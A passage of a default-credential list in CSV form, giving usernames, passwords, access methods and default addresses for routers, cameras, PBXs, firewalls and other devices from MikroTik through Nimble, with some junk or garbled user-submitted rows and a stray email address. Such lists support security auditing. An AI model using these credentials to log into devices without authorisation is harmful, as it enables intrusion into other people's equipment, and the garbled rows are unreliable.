,http://189.150.32.11/,admin,admin,root,,\nmikrotik,MKE-3.28,3.28,http://189.150.32.11/,admin,admin,root,,\nmikrotik,MicroTik,2.9.27,,admin,123,,,\nmikrotik,Mikrotik,2.95,,multilink,,,,\nmikrotik,Mikrotik2.9.42 windows xp,2.9.42,,admin,admin,admin,,\nmikrotik,RB/411,,192.168.88.1,admin,,Admin,,\nmikrotik,RB1000,,,admin,,Admin,,\nmikrotik,RB1100,,192.168.88.1,admin,,Admin,,\nmikrotik,RB1100AH,,192.168.88.1,admin,,Admin,,\nmikrotik,RB1200,,,admin,,Admin,,\nmikrotik,RB450,,192.168.88.1,admin,,Admin,,\nmikrotik,RB450G,,192.168.88.1,admin,,Admin,,\nmikrotik,RB600A,,,admin,,Admin,,\nmikrotik,RB750,4.1,http://192.168.0.254,admin,,root,,\nmikrotik,RB750G,,192.168.88.1,admin,,Admin,,\nmikrotik,RB750GL,,192.168.88.1,admin,,Admin,,\nmikrotik,RB751U-2HnD,,192.168.88.1,admin,,Admin,,\nmikrotik,RB800,,192.168.88.1,admin,,Admin,,\nmikrotik,Router OS,2.9.17,HTTP,admin,,Admin,,\nmikrotik,Router OS,all,Telnet,admin,,Admin,also for SSH and Web access,\nmikrotik,Sextant,,192.168.88.1,admin,,Admin,,\nmikrotik,TD-W8901N,1.0,172.16.0.1,,,Admin,not,\nmikrotik,Windows 7,v5.22,http://10.0.0.254,admin,admin,admin,heheheheh,\nmikrotik,Windows XP,3.2,10.15.113.1,admin,admin,,,\nmikrotik,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,admin,admin,admin,admin,\nmikrotik,mikrotik411AR,5.2,00:0C:42:D7:79:FD,admin,,admin,HSL3w,\nmikrotik,speedy,10.1,admin,rfnet,admin,admin,admin,\nmikrotik,wbr-2310,1.0,192.168.7.103,admin,,admin,,\nmikrotik,webbox 4.11,webbox-4.11,http://192.168.18.1,admin,,,,\nmikrotik,webbox,2.9.27,,admin,admin,admin,admin,\nmikrotik,webbox,2.9.6,192.168.0.254,hakeri,123456,guest,split.walker-production@hotmail.com,\nmikrotik,webbox,2.9.6,bounce,admin,admin,bounce,,\nmikrotik,webbox,2.9.6,bounce,admin,admin,bounce,12345,\nmikrotik,windows XP,RouterOS v5.23,192.168.88.1,admin,,admin,,\nmikrotik,windows xp,2.9.27,192.168.0.5,admin,18022011,root,,\nmikrotik,windows xp,2.9.34,http://10.1.11.1,admin,admin,Admin,,\nmikrotik,windows xp,webbox 2.9.27 login,192.168.2.1,admin,admin,root,,\nmilan,mil-sm801p,,Multi,root,root,Admin,,\nminitar,MN54G4R,,192.168.1.253,,admin,Admin,,\nminitar,MNWAPB,,192.168.1.1,admin,1234,Admin,,\nminitar,MNWAPGR,,192.168.123.254,,admin,Admin,,\nminitar,MVA11A,,192.168.3.1,admin,admin,Admin,,\nminoltaqms,Magicolor 3100,3.0.0,HTTP,admin,,Admin,Gives access to Accounting,\nminoltaqms,Magicolor 3100,3.0.0,HTTP,operator,,Admin,,\nmintel,Mintel PBX,,,,SYSTEM,,,\nmintel,Mintel PBX,,,,SYSTEM,Admin,,\nmintel,Mintel PBX,,Admin,,SYSTEM,,,\nmitel,3300 ICP,all,HTTP,system,password,Admin,,\nmitel,5000,5.1.0.20,192.168.200.201,admin,itpassw,admin,,\nmitel,MN3100ICP,,,system,mnet,,,\nmitel,MN3100ICP,,HTTP,system,mnet,,,\nmitel,SX200,All,Maint Port/attendant console,installer,1000,unlimited,This access controlls all other levels,\nmitel,SX2000,all,Multi,,,Admin,,\nmitel,SX2000,light,console,system,sx2000,Full installer,,\nmitel,sx2000,light,console,system,sx2000,Full installer,,\nmitelnetworks,SX2000,,,1nstaller,5X2000,,,\nmitelnetworks,SX2000,,,installer,sx2000,,,\nmitelnetworks,SX2000,,,maint1,sx2000,,,\nmitelnetworks,SX2000,,,maint2,sx2000,,,\nmitelnetworks,SX2000,,,s1stem,5X2000,,,\nmitelnetworks,SX2000,,,system,sx2000,,,\nmklencke,Forumtalk,1.0rc2,,root,blablabla,Admin,,\nmobotix,D10,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,D10,,ISDN Dial in,linux,tux,,,\nmobotix,D12,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,D14,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,D22M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,D24M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,M1,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,M1,,ISDN Dial in,linux,tux,,,\nmobotix,M10,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,M10,,192.168.x.x,admin,meinsm,,,\nmobotix,M10,,HTTP,admin,meinsm,192.168.x.x,,\nmobotix,M10,,ISDN Dial in,linux,tux,,,\nmobotix,M12,,http,admin,meinsm,http,,\nmobotix,M22M,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,M24M,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,MOBOTIX M12,,http,admin,meinsm,http,,\nmobotix,Q22M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,Q24M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,S14,,10.8.0.11,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.99),\nmobotix,T24MX,,,admin,admin,Admin,,\nmobotix,Windows XP,all versions,http://192.168.0.1,,ronda_atocha,guest,,\nmobotix,abosalem,1,aaa,abosalem,1407,,,\nmobotix,m22-m,m22-m,http://10.3.148.115,admin,meinsm,Admin,admin,\nmotive,Chorus,,,admin,isee,Admin,,\nmotorola,Cablerouter,,,cablecom,router,,,\nmotorola,Cablerouter,,Admin,cablecom,router,,,\nmotorola,Cablerouter,,Telnet,cablecom,router,Admin,,\nmotorola,Canopy 5.7 GHz,,169.254.1.1,admin,,Admin,,\nmotorola,Canopy 900 MHz,,169.254.1.1,root,,Admin,,\nmotorola,DPC-550 cell phone,,keypad,,0,unlocks the phone,,\nmotorola,DPC-550 cell phone,,keypad,,000000000000,unlocks the phone,,\nmotorola,DPC-550 cell phone,,keypad,,1.23E+11,unlocks the phone,,\nmotorola,DPC-550 cell phone,,keypad,,123456123456,unlocks the phone,,\nmotorola,FX7400,1,HTTP://,admin,change,Admin Access,This was a pain in the ass to find.,\nmotorola,Motorola Cablerouter,,,cablecom,router,Admin,,\nmotorola,SB5100,,http://192.168.100.1,,,Administration,,\nmotorola,SB5120,,http://192.168.100.1,,,Administration,,\nmotorola,SBG900,,HTTP,admin,motorola,Admin,,\nmotorola,SURFboard,,,technician,yZgO8Bvj,,,\nmotorola,Various,,,service,smile,,,\nmotorola,Various,,,setup,,,,\nmotorola,WR850G Router,,,admin,password,,,\nmotorola,WR850G,4.03,HTTP,admin,motorola,Admin,higher revisions likely the same,\nmotorola,WR850R,,HTTP,admin,motorola,,,\nmotorola,Wireless Router,WR850G,HTTP,admin,motorola,Admin,,\nmotorola,vanguard,,Multi,,,Admin,,\nmotorola,wr850r,,,admin,motorola,,,\nmp3mystic,MP3Mystic,,,admin,mp3mystic,,,\nmp3mystic,MP3Mystic,,http,admin,mp3mystic,Admin,,\nmro software,maximo,,Admin,SYSADM,sysadm,,,\nmro software,maximo,,v4.1,SYSADM,sysadm,,,\nmrosoftware,maximo,v4.1,Multi,SYSADM,sysadm,Admin,,\nmrv,3312-4c,,Multi,admin,admin,all,,\nmrv,3312-4c,,all,admin,admin,,,\nmsi,RG54GS,,192.168.1.254,,admin,Admin,,\nmtechnology,PC BIOS,,Console,,mMmM,Admin,,\nmultitech,RASExpress Server,,,guest,,,5.30a,\nmutare software,EVM Admin,,All,,admin,,,\nmutaresoftware,EVM Admin,All,HTTP,,admin,Admin,,\nmuze,Ariadne,,2.2.1,admin,muze,,,\nmuze,Ariadne,2.2.1,http,admin,muze,Admin,,\nmy test,1.0,,You,Loser,1234,,,\nmysql,Eventum,,,admin@example.com,admin,,,\nmysql,Eventum,,http,admin@example.com,admin,Admin,,\nmysql,MySQL,,,root,,,,\nmysql,MySQL,all,,root,,Admin,,\nnai,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin, : must be changed at 1st connection,\nnai,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin,: must be changed at 1st connection,\nnai,Intrushield IPS,1200/2600/4000,SSH + Web console,admin,admin123,Admin,,\nnanoteq,NetSeq firewall,,,admin,NetSeq,,*,\nnanoteq,NetSeq,,,admin,NetSeq,,,\nncr,NCR UNIX,,,ncrm,ncrm,,,\nncr,NCR UNIX,,Admin,ncrm,ncrm,,,\nncr,NCR UNIX,,Multi,ncrm,ncrm,Admin,,\nnec,Aspire UltraMail,,192.168.1.250,2000,CTL,,,\nnec,Aspire webpro,,172.16.0.10,ASPIRE,12345678,Admin,,\nnec,DT700 Phone,All versions,press the HOLD,TRF,*,# keys in order,ADMIN (caps sensitive),6633222\nnec,Elite IPK,,,admin,password,,,\nnec,WARPSTAR-BaseStation,,Telnet,,,Admin,,\nnec,phw10801,powermate p6050,console,,,guest,,\nnetapp,NetCache,,,admin,NetCache,,,\nnetapp,NetCache,,,admin,NetCache,,any,\nnetapp,SANscreen,,,admin,admin123,,,\nnetapp,SANscreen,5.1.3,http,admin,admin123,Admin,,\nnetbotz,Netbotz Appliances,,,netbotz,netbotz,,,\nnetcomm,3G17WV,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G17Wn,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G18WV,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G18Wn,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G21WB,,10.0.0.138,admin,admin,Admin,,\nnetcomm,3G9WB,,10.0.0.138,admin,admin,Admin,,\nnetcomm,3GT1WN,,10.0.0.138,admin,admin,Admin,,\nnetcomm,GTV300,all,192.168.30.1,admin,admin,Admin,web,\nnetcomm,GTV300,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\nnetcomm,N3G002W,,192.168.123.254,admin,admin,Admin,,\nnetcomm,N3G005W,,192.168.123.254,,admin,Admin,,\nnetcomm,N3G9W,,10.0.0.1,admin,admin,Admin,,\nnetcomm,N3G9W,Supplied by Telstra,10.0.0.138,admin,admin,Admin,,\nnetcomm,NB1,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB11W,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB12WD,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB1300+4,,,admin,password,,,\nnetcomm,NB1300+4,all,Multi,admin,password,,,\nnetcomm,NB1300,,,admin,password,,,\nnetcomm,NB1300,all,192.168.1.1 or 192.168.0.1,admin,password,Admin,,\nnetcomm,NB1300,all,Multi,admin,password,,,\nnetcomm,NB1300PLUS4,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB1300PLUS4W,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB14,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB1400,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB14WN,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB2800,all,192.168.1.1,,admin,Admin,,\nnetcomm,NB3000,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB304N,all,192.168.1.1 (ethernet) or 192.168.1.2 (USB),root,root,root,,\nnetcomm,NB3100,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB3300,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB4,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB5,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB5,all,192.168.1.1,root,root,Admin,,\nnetcomm,NB504,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB5540,all,192.168.1.1,,admin,Admin,,\nnetcomm,NB5580 / NB5580W,,,,admin,Admin,Any user name (or blank) is valid with this password,\nnetcomm,NB5580,,,,admin,Admin,Any user name (or blank) is valid with this password,\nnetcomm,NB5580,,,admin,admin,Admin,,\nnetcomm,NB5580W,,,,admin,Admin,Any user name (or blank) is valid with this password,\nnetcomm,NB5580W,,,admin,admin,Admin,,\nnetcomm,NB5PLUS4,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB5PLUS4W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB600W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB604N,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB620W,all,192.168.1.1,admin,,Admin,,\nnetcomm,NB6PLUS4,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6PLUS4W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6PLUS4WN,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB7,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB750,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB7PLUS4W,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB8W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9WMAXX,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9WMAXXN,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NBF3ADV,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NP740N,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NP800N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP801N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP802N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP803N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP804N,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NTC-5908,all,192.168.1.1,root,admin,Admin,,\nnetcomm,V100,all,DHCP or fixed IP,root,NetC0mmV1oo,Admin,,\nnetcomm,V200,all,192.168.30.1,root,NetC0mmV2oo,Admin,,\nnetcomm,V210P,all,192.168.22.1,admin,admin,Admin,,\nnetcomm,V300,all,192.168.30.1,admin,admin,Admin,web,\nnetcomm,V300,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\nnetcomm,V300MNF,all,192.168.30.1,admin,admin,Admin,web,\nnetcomm,V300MNF,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\nnetcomm,V300MNF,all,DHCP,admin,admin,Admin,,\nnetcordia,NetMRI,,http,admin,admin,Admin,,\nnetgear fr314,Firewall router,,,admin,password,,,\nnetgear fr314,Firewall router,,Admin,admin,password,,,\nnetgear,802.11b Wireless Cable/DSL router,,MR814,admin,password,,,\nnetgear,CG2003,,192.168.0.1,admin,password,Admin,,\nnetgear,CG3000,,192.168.0.1,MSO,changeme,Super User,,\nnetgear,CG3000,,192.168.0.1,admin,password,Admin,,\nnetgear,CG3000D-RG,,http://192.168.0.1,chtruser,charter,administrator,this is the charter cable residential gateway. the sticker on the side of the unit incorrectly identifies the Netgear default userid/password of admin/password. As indicated the firmware defaults are userid: chtruser,password: charter\nnetgear,CG3100,,192.168.0.1 or 192.168.100.1,admin,password,Admin,,\nnetgear,CG814GCMR,,http://192.168.0.1,admin,password,admin,charter communications,\nnetgear,CG814WB,,192.168.0.1,admin,password,Admin,,\nnetgear,CG814WG,v2,192.168.0.1,comcast,1234,setup,,\nnetgear,CGD24N,,192.168.0.1 or 192.168.100.1,admin,password,Admin,,\nnetgear,CGD24N,,192.168.0.1 or 192.168.100.1,superuser,password,Admin,,\nnetgear,CVG824G,,192.168.0.1,admin,password,Admin,,\nnetgear,Cable/DSL Router,,RT-314,admin,1234,,,\nnetgear,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics page,192.168.0.1/docsisdevicestatus.html,\nnetgear,DG632 ADSL Modem,V3.3.0a_cx,HTTP,admin,password,Admin,,\nnetgear,DG632,,http://192.168.0.1,admin,password,Administration,,\nnetgear,DG814 Router,,,admin,password,Admin,,\nnetgear,DG824G,,,admin,password,Admin,,\nnetgear,DG824M,,,admin,password,Admin,,\nnetgear,DG834,,http://192.168.0.1,admin,password,Administration,,\nnetgear,DG834G,,,,admin,Admin,,\nnetgear,DG834G,,,,zebra,,,\nnetgear,DG834G,,http://192.168.0.1,admin,password,Administration,,\nnetgear,DG834G,,telnet,,zebra,Admin,,\nnetgear,DG834GT,V1.03.87,http://192.168.0.1,,,root,,\nnetgear,DG834GV,,192.168.0.1,admin,password,Admin,,\nnetgear,DG834GVSP,,192.168.0.1,admin,password,Admin,,\nnetgear,DG834PN RangeMax ADSL Wireless Router,,,admin,password,,,\nnetgear,DG934G,,,admin,sky,admin,,\nnetgear,DGFV338,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN1000,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN2000,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN2200,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN2200M,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN3500,,192.168.1.1,admin,password,Admin,,\nnetgear,DGND3300,,192.168.0.1,admin,password,Admin,,\nnetgear,DGND3700,,192.168.0.1,admin,password,Admin,,\nnetgear,DIR300,,192.168.0.1,admin,password,Admin,,\nnetgear,DM11P,,192.168.0.1,admin,password,Admin,,\nnetgear,DM602,,192.168.0.1,admin,password,Admin,,\nnetgear,DM602,,FTP Telnet and HTTP,admin,password,Admin,,\nnetgear,EVG2000,,10.0.0.138,admin,admin,Admin,,\nnetgear,FM114P,,192.168.0.1,admin,password,Admin,,\nnetgear,FM114P,,Multi,,,Admin,,\nnetgear,FR114P,,192.168.0.1,admin,password,Admin,,\nnetgear,FR114P,,HTTP,admin,password,Admin,,\nnetgear,FR314,,HTTP,admin,password,Admin,,\nnetgear,FR328S,,192.168.0.1,admin,password,Admin,,\nnetgear,FVS114,,192.168.0.1,admin,password,Admin,,\nnetgear,FVS318,,192.168.0.1,admin,password,Admin,,\nnetgear,FVS318,,HTTP,admin,password,Admin,,\nnetgear,FVS318G,,192.168.1.1,admin,password,Admin,,\nnetgear,FVS336G,,192.168.1.1,admin,password,Admin,,\nnetgear,FVS338,,192.168.1.1,admin,password,Admin,,\nnetgear,FVS338,,HTTP,admin,password,Admin,,\nnetgear,FVX538,,192.168.0.1,admin,password,Admin,,\nnetgear,FWG114P,,192.168.0.1,admin,password,,,\nnetgear,FWG114P,,Multi,,admin,password,,\nnetgear,GS110TP,,192.168.0.239,,password,Admin,Switch may be on a different IP address if a DHCP server is available,\nnetgear,GS724T,V1.0.1_1104,HTTP,,password,Admin,,\nnetgear,GS724t,V1.0.1_1104,HTTP,,password,Admin,,\nnetgear,GSM7224,,HTTP,admin,,Admin,,\nnetgear,KWGR614,,www.routerlogin.net,admin,password,Admin,,\nnetgear,ME102 ,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5,\nnetgear,ME102,,192.168.1.254,,default,Admin,,\nnetgear,ME102,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5,\nnetgear,MR-314,,3.26,admin,1234,,,\nnetgear,MR-314,,Admin,admin,1234,,,\nnetgear,MR-314,3.26,HTTP,admin,1234,Admin,,\nnetgear,MR314,,192.168.0.1,admin,password,Admin,,\nnetgear,MR314,,Multi,admin,1234,Admin,,\nnetgear,MR314,3.26,HTTP,admin,1234,Admin,,\nnetgear,MR814,,192.168.0.1,admin,password,Admin,,\nnetgear,MR814,,HTTP,admin,password,Admin,,\nnetgear,N600,,,admin,password,,,\nnetgear,RM356,,Admin,,1234,,,\nnetgear,RM356,,None,,1234,,,\nnetgear,RM356,,Telnet,,1234,Admin,shutdown the router via internet,\nnetgear,RM356,None,Telnet,,1234,Admin,shutdown the router via internet,\nnetgear,RP114,,,admin,1234,,,\nnetgear,RP114,,192.168.0.1,admin,1234,Admin,,\nnetgear,RP114,,3.26,,1234,,,\nnetgear,RP114,,Admin,admin,1234,,,\nnetgear,RP114,,Multi,admin,1234,admin,,\nnetgear,RP114,,Telnet,admin,1234,Admin,,\nnetgear,RP114,,admin,admin,1234,,,\nnetgear,RP114,3.20-3.26,HTTP,admin,1234,Admin,default http://192.168.0.1,\nnetgear,RP114,3.26,Telnet,,1234,Admin,telnet 192.168.0.1,\nnetgear,RP614,,,admin,password,,,\nnetgear,RP614,,Admin,admin,password,,,\nnetgear,RP614,,HTTP,admin,password,Admin,,\nnetgear,RT-311,,Admin,Admin,1234,,,\nnetgear,RT-311,,HTTP,Admin,1234,Admin,,\nnetgear,RT311,,,Admin,1234,,Any,\nnetgear,RT311,,HTTP,Admin,1234,Admin,,\nnetgear,RT311/RT314,,,admin,1234,,,\nnetgear,RT314,,,admin,admin,,,\nnetgear,RT314,,192.168.0.1,admin,1234,Admin,,\nnetgear,RT314,,Admin,admin,1234,,,\nnetgear,RT314,,Admin,admin,admin,,,\nnetgear,RT314,,HTTP and Telnet,admin,1234,Admin,,\nnetgear,RT314,,HTTP,admin,admin,Admin,,\nnetgear,Ready NAS Duo,,http or Raidar,admin,netgear1,system setup,,\nnetgear,ReadyNAS,,,admin,netgear1,,,\nnetgear,Router,,DG814,admin,password,,,\nnetgear,Router/Modem,,Multi,admin,password,Admin,,\nnetgear,TA612V,,192.168.61.1,admin,password,Admin,,\nnetgear,WAP54G,,,,admin,Admin,,\nnetgear,WG302,,,admin,password,,,\nnetgear,WG302,,HTTP,admin,password,,,\nnetgear,WG602 Router,2,,admin,password,,,\nnetgear,WG602,,192.168.0.227,admin,password,Admin,,\nnetgear,WG602,,Firmware Version 1.04.0,super,5777364,,,\nnetgear,WG602,,Firmware Version 1.5.67,super,5777364,,,\nnetgear,WG602,,Firmware Version 1.7.14,superman,21241036,,,\nnetgear,WG602,Firmware Version 1.04.0,HTTP,super,5777364,Admin,,\nnetgear,WG602,Firmware Version 1.5.67,HTTP,super,5777364,Admin,,\nnetgear,WG602,Firmware Version 1.7.14,HTTP,superman,21241036,Admin,,\nnetgear,WGE101,,,admin,password,Admin,,\nnetgear,WGR-614,,admin,admin,password,,,\nnetgear,WGR101 Router,,,admin,password,,,\nnetgear,WGR613V,,192.168.61.1,admin,password,Admin,,\nnetgear,WGR614 Router,v4,,admin,setup,Admin,,\nnetgear,WGR614,,192.168.0.1 or 192.168.1.1,admin,password,Admin,,\nnetgear,WGR614,v5,http://192.168.0.1 or http://routerlogin.net/,admin,password,Administration,,\nnetgear,WGR614L,,192.168.61.1,admin,admin,Admin,,\nnetgear,WGR624 Router,,,admin,password,,,\nnetgear,WGT624,,http://192.168.0.1,admin,password,Administration,,\nnetgear,WGT624,,http://192.168.1.1,admin,password,Administration,,\nnetgear,WGT634U,,192.168.1.1,admin,password,Admin,,\nnetgear,WGT634U,,HTTP,admin,password,Admin,,\nnetgear,WGU624,,http://192.168.1.1,admin,password,Administration,,\nnetgear,WGX102,AP,192.168.0.101,admin,password,Admin,SSID is NETGEAR,\nnetgear,WN2000RPT,,http://192.168.0.1,admin,password,Administration,,\nnetgear,WNAP320,AP,192.168.0.100,admin,password,Admin,SSID is NETGEAR_11ng,\nnetgear,WNDAP620,AP,192.168.0.100,admin,password,Admin,,\nnetgear,WNDR3300,,192.168.1.1,admin,password,admin,,\nnetgear,WNDR3300,all,http://192.168.0.1,,,admin,,\nnetgear,WNDR3400,,192.168.1.1,admin,password,admin,,\nnetgear,WNDR3700,,192.168.1.1,admin,password,admin,,\nnetgear,WNDR3800,,192.168.1.1 or www.routerlogin.net or www.routerlogin.com,admin,password,admin,,\nnetgear,WNDR4000,,192.168.0.1 or www.routerlogin.com,admin,password,admin,,\nnetgear,WNDR4500,,192.168.1.1,admin,password,admin,,\nnetgear,WNR2000,,192.168.0.1,admin,password,admin,,\nnetgear,WNR3500,,192.168.1.1,admin,password,admin,,\nnetgear,WNR3500L,,192.168.1.1,Admin,Password,admin,,\nnetgear,WNR834B,,192.168.1.1,admin,password,admin,,\nnetgear,WNR854T,,,admin,password,admin,,\nnetgear,WPN824,,http://192.168.1.1,admin,password,,,\nnetgear,WPN824N,,http://192.168.1.1,admin,password,,,\nnetgear,WPNT834,,192.168.1.1,admin,admin,admin,,\nnetgear,wpn824,,,edel,1234567,,,\nnetgeatr,RP114,,3.20-3.26,admin,1234,,,\nnetgenesis,NetAnalysis Web Reporting,,,naadmin,naadmin,,,\nnetgenesis,NetAnalysis Web Reporting,,Admin,naadmin,naadmin,,,\nnetgenesis,NetAnalysis Web Reporting,,HTTP,naadmin,naadmin,Admin,,\nnetopia,3351,,Multi,,,Admin,,\nnetopia,4542,,Multi,admin,noway,Admin,,\nnetopia,Caiman 3200,3200,http://192.168.1.1,admin,1234,,,\nnetopia,Netopia 7100,,,,,,,\nnetopia,Netopia 7100,,Admin,,,,,\nnetopia,Netopia 7100,,Telnet,,,Admin,,\nnetopia,Netopia 9500,,,netopia,netopia,,,\nnetopia,Netopia 9500,,Admin,netopia,netopia,,,\nnetopia,Netopia 9500,,Telnet,netopia,netopia,Admin,,\nnetopia,R7100,,,admin,admin,,4.6.2,\nnetopia,R910,,Multi,admin,,Admin,,\nnetopia,routers,,,factory,(see note),,,\nnetport,Express 10/100,,,setup,setup,,,\nnetport,Express 10/100,,Admin,setup,setup,,,\nnetport,Express 10/100,,multi,setup,setup,Admin,,\nnetscape,Enterprise Server,,http,admin,admin,Admin,,\nnetscape,Netscape Enterprise Server,,,admin,admin,,,\nnetscreen,Firewall,,,netscreen,netscreen,,,\nnetscreen,Firewall,,Admin,netscreen,netscreen,,,\nnetscreen,Firewall,,multi,netscreen,netscreen,Admin,,\nnetscreen,IDP,,2.0p1,admin,netscreen,,,\nnetscreen,IDP,2.0p1,,admin,netscreen,Admin,,\nnetscreen,NS-5 NS10 NS-100,,,netscreen,netscreen,,,\nnetscreen,Netscreen,,,netscreen,netscreen,,,\nnetscreen,all firewalls,,all,netscreen,netscreen,,,\nnetscreen,firewall,,HTTP,Administrator,,Admin,,\nnetscreen,firewall,,Telnet,Administrator,,Admin,,\nnetscreen,firewall,,Telnet,admin,,Admin,,\nnetscreen,firewall,,Telnet,operator,,Admin,,\nnetscreen,ns-25,,,,,,,\nnetscreen,ns-25,,Admin,,,,,\nnetscreen,ns-25,,Multi,,,Admin,,\nnetstar,Netpilot,,,admin,password,,,\nnetstar,Netpilot,,Multi,admin,password,Admin,,\nnetwork appliance,NetCache,,Admin,admin,NetCache,,,\nnetwork appliance,NetCache,,any,admin,NetCache,,,\nnetwork associates,WebShield Security Appliance e250,,,e250,e250changeme,,,\nnetwork associates,WebShield Security Appliance e250,,Admin,e250,e250changeme,,,\nnetwork associates,WebShield Security Appliance e500,,,e500,e500changeme,,,\nnetwork associates,WebShield Security Appliance e500,,Admin,e500,e500changeme,,,\nnetworkappliance,NetCache,any,Multi,admin,NetCache,Admin,,\nnetworkassociates,WebShield Security Appliance e250,,HTTP,e250,e250changeme,Admin,,\nnetworkassociates,WebShield Security Appliance e500,,HTTP,e500,e500changeme,Admin,,\nnetworkeverywhere,NWR11B,,HTTP,,admin,Admin,,\nnetworkice,ICECap Manager,,2.0.22 <,iceman,,,,\nnetworkice,ICECap Manager,below 2.0.22,port 8081,iceman,,Admin,,\nnewbridge,Congo/Amazon/Tigris,,,netman,netman,,All versions,\nnewmedianetgmbh,DD-WRT,,,root,admin,,,\nnexland,ISB SOHO,,http://192.168.0.1,admin,,Administration,,\nnexland,ISB2LAN,,http://192.168.0.1,user:,,Administration,,\nnexland,Pro100,,http://192.168.0.1,user:,,Administration,,\nnexland,Pro400,,http://192.168.0.1,user:,,Administration,,\nnexland,Pro800 Turbo,,http://192.168.0.1,admin,,Administration,,\nnexsan,ATABoy2F,8.10f,http,ADMIN,PASSWORD,Admin,,\nnext,NeXTStep,,,me,,,,\nnext,NeXTStep,,,root,NeXT,,,\nnext,NeXTStep,,,signa,signa,,,\nnext,NeXTStep,,Admin,root,NeXT,,,\nnext,NeXTStep,,Multi,me,,User,,\nnext,NeXTStep,,Multi,root,NeXT,Admin,,\nnext,NeXTStep,,Multi,signa,signa,User,,\nnext,NeXTStep,,User,me,,,,\nnext,NeXTStep,,User,signa,signa,,,\nngsec,NGSecureWeb,,HTTP,admin,,Admin,,\nngsec,NGSecureWeb,,HTTP,admin,asd,Admin,,\nngsecure,The Hooy,,1,admin,admin,,,\nngsecure,The Hooy,,Admin,admin,admin,,,\nnicesystemsltd,NICELog,,,Administrator,nicecti,Admin,,\nnicesystemsltd,NICELog,,,Nice-admin,nicecti,Admin,,\nniksun,NetDetector,,,vcr,NetVCR,,,\nniksun,NetDetector,,Multi,vcr,NetVCR,Admin,su after login with empty password,\nniksun,c208,6.1,console,,,admin,it is not login vcr!!!,\nnimble,BIOS,,Console,,xdfk9874t3,Admin,,\nnimble,PC BIOS,,,,xdfk9874t3,,,\nnimble,PC BIOS,,Admin,,xdfk9874t3,,,\nnimble,PC BIOS,,Console,,xdfk9874t3,Admin,,\nnixdorf,Siemens Nixdorf PC 